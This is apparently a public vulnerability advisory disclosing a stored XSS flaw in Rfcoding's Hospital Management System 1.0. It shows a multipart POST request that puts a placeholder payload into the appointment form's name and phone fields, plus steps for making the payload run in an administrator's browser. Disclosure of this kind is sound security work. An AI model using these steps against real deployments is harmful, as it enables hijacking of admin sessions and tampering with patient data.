┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://www.codester.com/items/33819/                                      │
│  Vendor   : Rfcoding                                                                   │
│  Software : Hospital Management System 1.0                                             │
│  Vuln Type: Stored XSS                                                                 │
│  Impact   : Manipulate the content of the site                                         │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│                                                                                        │
│  Allow Attacker to inject malicious code into website, give ability to steal sensitive │
│  information, manipulate data, and launch additional attacks.                          │
│                                                                                        │   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


## Stored XSS


POST /home/appointment/create HTTP/2

-----------------------------262834650130522416703979271446
Content-Disposition: form-data; name="name"

[XSS Payload]
-----------------------------262834650130522416703979271446
Content-Disposition: form-data; name="phone"

[XSS Payload]
-----------------------------262834650130522416703979271446


## Steps to Reproduce:

1. Visit Website (as Guest) and Click on [Appointment] on this Path (https://website/home/appointment)
2. Inject [XSS Payload] in Name
3. Inject [XSS Payload] in Phone
4. Fill Anything in the Other Fields
5. Press Submit

6. When the ADMIN visit the [Patient] to check [Appointment Scheduling] on this Path (https://website/admin/patient)
7. XSS Will Fire and Executed on his Browser 


[-] Done